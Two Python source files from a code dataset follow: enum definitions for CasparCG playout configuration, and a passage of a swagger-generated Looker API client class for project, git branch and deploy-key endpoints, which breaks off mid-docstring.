bd73558233191a5e70014a1957235ba1ec247387 | 5,997 | py | Python | Playout/Models/ccgEnums.py | mekhti/t4Playout | 1e45c93b48d4ce12c345108a5b2e31d33e395b24 | [
"MIT"
] | null | null | null | Playout/Models/ccgEnums.py | mekhti/t4Playout | 1e45c93b48d4ce12c345108a5b2e31d33e395b24 | [
"MIT"
] | 2 | 2019-12-18T00:05:30.000Z | 2020-07-09T07:42:02.000Z | Playout/Models/ccgEnums.py | mekhti/t4Playout | 1e45c93b48d4ce12c345108a5b2e31d33e395b24 | [
"MIT"
] | null | null | null |
class LoggingLevels():
TRAC = 'trace'
DEBG = 'debug'
INFO = 'info'
WARN = 'warning'
ERRO = 'error'
FATL = 'fatal'
Choices = (
(TRAC, 'trace'),
(DEBG, 'debug'),
(INFO, 'info'),
(WARN, 'warning'),
(ERRO, 'error'),
(FATL, 'fatal'),
)
class LogCategories():
COMM = 'communication'
CTRC = 'calltrace'
BOTH = 'calltrace,communication'
Choices = (
(COMM, 'communication'),
(CTRC, 'calltrace'),
(BOTH, 'calltrace,communication'),
)
class Accelerator():
AUTO = 'auto'
CPU = 'cpu'
GPU = 'gpu'
Choices = (
(AUTO, 'auto'),
(CPU, 'cpu'),
(GPU, 'gpu'),
)
class VIdeoMode():
VM_PAL = 'PAL'
VM_NTSC = 'NTSC'
VM_576p2500 = '576p2500'
VM_720p2398 = '720p2398'
VM_720p2400 = '720p2400'
VM_720p2500 = '720p2500'
VM_720p5000 = '720p5000'
VM_720p2997 = '720p2997'
VM_720p5994 = '720p5994'
VM_720p3000 = '720p3000'
VM_720p6000 = '720p6000'
VM_1080p2398 = '1080p2398'
VM_1080p2400 = '1080p2400'
VM_1080i5000 = '1080i5000'
VM_1080i5994 = '1080i5994'
VM_1080i6000 = '1080i6000'
VM_1080p2500 = '1080p2500'
VM_1080p2997 = '1080p2997'
VM_1080p3000 = '1080p3000'
VM_1080p5000 = '1080p5000'
VM_1080p5994 = '1080p5994'
VM_1080p6000 = '1080p6000'
VM_1556p2398 = '1556p2398'
VM_1556p2400 = '1556p2400'
VM_1556p2500 = '1556p2500'
VM_dci1080p2398 = 'dci1080p2398'
VM_dci1080p2400 = 'dci1080p2400'
VM_dci1080p2500 = 'dci1080p2500'
VM_2160p2398 = '2160p2398'
VM_2160p2400 = '2160p2400'
VM_2160p2500 = '2160p2500'
VM_2160p2997 = '2160p2997'
VM_2160p3000 = '2160p3000'
VM_2160p5000 = '2160p5000'
VM_2160p5994 = '2160p5994'
VM_2160p6000 = '2160p6000'
VM_dci2160p2398 = 'dci2160p2398'
VM_dci2160p2400 = 'dci2160p2400'
VM_dci2160p2500 = 'dci2160p2500'
Choices = (
(VM_PAL, 'PAL'),
(VM_NTSC, 'NTSC'),
(VM_576p2500, '576p2500'),
(VM_720p2398, '720p2398'),
(VM_720p2400, '720p2400'),
(VM_720p2500, '720p2500'),
(VM_720p5000, '720p5000'),
(VM_720p2997, '720p2997'),
(VM_720p5994, '720p5994'),
(VM_720p3000, '720p3000'),
(VM_720p6000, '720p6000'),
(VM_1080p2398, '1080p2398'),
(VM_1080p2400, '1080p2400'),
(VM_1080i5000, '1080i5000'),
(VM_1080i5994, '1080i5994'),
(VM_1080i6000, '1080i6000'),
(VM_1080p2500, '1080p2500'),
(VM_1080p2997, '1080p2997'),
(VM_1080p3000, '1080p3000'),
(VM_1080p5000, '1080p5000'),
(VM_1080p5994, '1080p5994'),
(VM_1080p6000, '1080p6000'),
(VM_1556p2398, '1556p2398'),
(VM_1556p2400, '1556p2400'),
(VM_1556p2500, '1556p2500'),
(VM_dci1080p2398, 'dci1080p2398'),
(VM_dci1080p2400, 'dci1080p2400'),
(VM_dci1080p2500, 'dci1080p2500'),
(VM_2160p2398, '2160p2398'),
(VM_2160p2400, '2160p2400'),
(VM_2160p2500, '2160p2500'),
(VM_2160p2997, '2160p2997'),
(VM_2160p3000, '2160p3000'),
(VM_2160p5000, '2160p5000'),
(VM_2160p5994, '2160p5994'),
(VM_2160p6000, '2160p6000'),
(VM_dci2160p2398, 'dci2160p2398'),
(VM_dci2160p2400, 'dci2160p2400'),
(VM_dci2160p2500, 'dci2160p2500'),
)
class AudioChannelsLayout():
MONO = 'mono'
STRO = 'stereo'
MTRX = 'matrix'
FILM = 'film'
SMPT = 'smpte'
ER8A = 'ebu_r123_8a'
ER8B = 'ebu_r123_8b'
A8CH = '8ch'
A16C = '16ch'
Choices = (
(MONO, 'mono'),
(STRO, 'stereo'),
(MTRX, 'matrix'),
(FILM, 'film'),
(SMPT, 'smpte'),
(ER8A, 'ebu_r123_8a'),
(ER8B, 'ebu_r123_8b'),
(A8CH, '8ch'),
(A16C, '16ch'),
)
class DecklinkLatency():
NORM = 'normal'
LOW = 'low'
DFLT = 'default'
Choices = (
(NORM, 'normal'),
(LOW, 'low'),
(DFLT, 'default'),
)
class DecklinkKeyer():
EXTR = 'external'
EXSD = 'external_separate_device'
INTR = 'internal'
DFLT = 'default'
Choices = (
(EXTR, 'external'),
(EXSD, 'external_separate_device'),
(INTR, 'internal'),
(DFLT, 'default'),
)
class BluefishSDIStream():
SDI_A = 'a'
SDI_B = 'b'
SDI_C = 'c'
SDI_D = 'd'
Choices = (
(SDI_A, 'a'),
(SDI_B, 'b'),
(SDI_C, 'c'),
(SDI_D, 'd'),
)
class BluefishKeyer():
EXTR = 'external'
INTR = 'internal'
DSBL = 'disabled'
Choices = (
(EXTR, 'external'),
(INTR, 'internal'),
(DSBL, 'disabled'),
)
class BluefishInternalKeyerAudioSource():
VIDO = 'videooutputchannel'
SDIO = 'sdivideoinput'
Choices = (
(VIDO, 'videooutputchannel'),
(SDIO, 'sdivideoinput'),
)
class ScreenAspectRatio():
DFLT = 'default'
AR_4_3 = '4:3'
AR_16_9 = '16:9'
Choices = (
(DFLT, 'default'),
(AR_4_3, '4:3'),
(AR_16_9, '16:9'),
)
class ScreenStretch():
NONE = 'none'
FILL = 'fill'
UNFR = 'uniform'
U2FL = 'uniform_to_fill'
Choices = (
(NONE, 'none'),
(FILL, 'fill'),
(UNFR, 'uniform'),
(U2FL, 'uniform_to_fill'),
)
class FFMPEGOutputType():
NONE = 'none'
FILE = 'file'
STRM = 'stream'
Choices = (
(NONE, 'none'),
(FILE, 'file'),
(STRM, 'stream'),
)
class StreamAudioCodec():
AAC = 'aac'
MP2 = 'mp2'
Choices = (
(AAC, 'aac'),
(MP2, 'mp2'),
)
class StreamVideoCodec():
H264 = 'libx264'
MPG2 = 'mpeg2video'
MJPG = 'mjpeg'
C264 = 'nvenc_264'
C265 = 'nvenc_265'
QSV4 = 'h264_qsv'
Choices = (
(H264, 'libx264'),
(MPG2, 'mpeg2video'),
(MJPG, 'mjpeg'),
(C264, 'nvenc_264'),
(C265, 'nvenc_265'),
(QSV4, 'h264_qsv'),
) | 24.181452 | 43 | 0.539103 | 543 | 5,997 | 5.740331 | 0.268877 | 0.021174 | 0.008341 | 0.01155 | 0.834777 | 0.834777 | 0.764838 | 0.728906 | 0.728906 | 0.728906 | 0 | 0.300359 | 0.303819 | 5,997 | 248 | 44 | 24.181452 | 0.446228 | 0 | 0 | 0.141631 | 0 | 0 | 0.241121 | 0.015675 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.532189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
bdb6a7e615e3a1d8be7f1fd7a2bd34d0b5186e68 | 73,274 | py | Python | looker_client_30/api/project_api.py | gustavs408650/looker_sdk_30 | 8b52449f216b2cb3b84f09e2856bcea1ed4a2b0c | [
"MIT"
] | null | null | null | looker_client_30/api/project_api.py | gustavs408650/looker_sdk_30 | 8b52449f216b2cb3b84f09e2856bcea1ed4a2b0c | [
"MIT"
] | null | null | null | looker_client_30/api/project_api.py | gustavs408650/looker_sdk_30 | 8b52449f216b2cb3b84f09e2856bcea1ed4a2b0c | [
"MIT"
] | 1 | 2019-11-12T10:05:51.000Z | 2019-11-12T10:05:51.000Z | # coding: utf-8
"""
Looker API 3.0 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning. Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning) # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from looker_client_30.api_client import ApiClient
class ProjectApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def all_git_branches(self, project_id, **kwargs): # noqa: E501
"""Get All Git Branchs # noqa: E501
### Get All Git Branches Returns a list of git branches in the project repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_git_branches(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: list[GitBranch]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_git_branches_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.all_git_branches_with_http_info(project_id, **kwargs) # noqa: E501
return data
def all_git_branches_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get All Git Branchs # noqa: E501
### Get All Git Branches Returns a list of git branches in the project repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_git_branches_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: list[GitBranch]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_git_branches" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `all_git_branches`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git_branches', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GitBranch]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def all_git_connection_tests(self, project_id, **kwargs): # noqa: E501
"""Get All Git Connection Tests # noqa: E501
### Get All Git Connection Tests Returns a list of tests which can be run against a project's git connection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_git_connection_tests(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: list[GitConnectionTest]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_git_connection_tests_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.all_git_connection_tests_with_http_info(project_id, **kwargs) # noqa: E501
return data
def all_git_connection_tests_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get All Git Connection Tests # noqa: E501
### Get All Git Connection Tests Returns a list of tests which can be run against a project's git connection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_git_connection_tests_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: list[GitConnectionTest]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_git_connection_tests" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `all_git_connection_tests`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git_connection_tests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GitConnectionTest]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def all_project_files(self, project_id, **kwargs): # noqa: E501
"""Get All Project Files # noqa: E501
### Get All Project Files Returns a list of the files in the project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_project_files(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: list[ProjectFile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_project_files_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.all_project_files_with_http_info(project_id, **kwargs) # noqa: E501
return data
def all_project_files_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get All Project Files # noqa: E501
### Get All Project Files Returns a list of the files in the project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_project_files_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: list[ProjectFile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_project_files" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `all_project_files`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/files', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ProjectFile]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def all_projects(self, **kwargs): # noqa: E501
"""Get All Projects # noqa: E501
### Get All Projects Returns all projects visible to the current user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_projects(async=True)
>>> result = thread.get()
:param async bool
:param str fields: Requested fields
:return: list[Project]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_projects_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.all_projects_with_http_info(**kwargs) # noqa: E501
return data
def all_projects_with_http_info(self, **kwargs): # noqa: E501
"""Get All Projects # noqa: E501
### Get All Projects Returns all projects visible to the current user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_projects_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str fields: Requested fields
:return: list[Project]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_projects" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Project]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_git_deploy_key(self, project_id, **kwargs): # noqa: E501
"""Create Deploy Key # noqa: E501
### Create Git Deploy Key Create a public/private key pair for authenticating ssh git requests from Looker to a remote git repository for a particular Looker project. Returns the public key of the generated ssh key pair. Copy this public key to your remote git repository's ssh keys configuration so that the remote git service can validate and accept git requests from the Looker server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_git_deploy_key(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_git_deploy_key_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.create_git_deploy_key_with_http_info(project_id, **kwargs) # noqa: E501
return data
def create_git_deploy_key_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Create Deploy Key # noqa: E501
### Create Git Deploy Key Create a public/private key pair for authenticating ssh git requests from Looker to a remote git repository for a particular Looker project. Returns the public key of the generated ssh key pair. Copy this public key to your remote git repository's ssh keys configuration so that the remote git service can validate and accept git requests from the Looker server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_git_deploy_key_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_git_deploy_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `create_git_deploy_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git/deploy_key', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_project(self, **kwargs): # noqa: E501
"""Create Project # noqa: E501
### Create A Project dev mode required. - Call `update_session` to select the 'dev' workspace. `name` is required. `git_remote_url` is not allowed. To configure Git for the newly created project, follow the instructions in `update_project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_project(async=True)
>>> result = thread.get()
:param async bool
:param Project body: Project
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_project_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_project_with_http_info(**kwargs) # noqa: E501
return data
def create_project_with_http_info(self, **kwargs): # noqa: E501
"""Create Project # noqa: E501
### Create A Project dev mode required. - Call `update_session` to select the 'dev' workspace. `name` is required. `git_remote_url` is not allowed. To configure Git for the newly created project, follow the instructions in `update_project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_project_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param Project body: Project
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_project" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Project', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def git_deploy_key(self, project_id, **kwargs): # noqa: E501
"""Git Deploy Key # noqa: E501
### Git Deploy Key Returns the ssh public key previously created for a project's git repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.git_deploy_key(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.git_deploy_key_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.git_deploy_key_with_http_info(project_id, **kwargs) # noqa: E501
return data
def git_deploy_key_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Git Deploy Key # noqa: E501
### Git Deploy Key Returns the ssh public key previously created for a project's git repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.git_deploy_key_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method git_deploy_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `git_deploy_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git/deploy_key', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project(self, project_id, **kwargs): # noqa: E501
"""Get Project # noqa: E501
### Get A Project Returns the project with the given project id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.project_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.project_with_http_info(project_id, **kwargs) # noqa: E501
return data
def project_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get Project # noqa: E501
### Get A Project Returns the project with the given project id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Project', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_file(self, project_id, file_id, **kwargs): # noqa: E501
"""Get Project File # noqa: E501
### Get Project File Info Returns information about a file in the project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_file(project_id, file_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str file_id: File Id (required)
:param str fields: Requested fields
:return: ProjectFile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.project_file_with_http_info(project_id, file_id, **kwargs) # noqa: E501
else:
(data) = self.project_file_with_http_info(project_id, file_id, **kwargs) # noqa: E501
return data
def project_file_with_http_info(self, project_id, file_id, **kwargs): # noqa: E501
"""Get Project File # noqa: E501
### Get Project File Info Returns information about a file in the project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
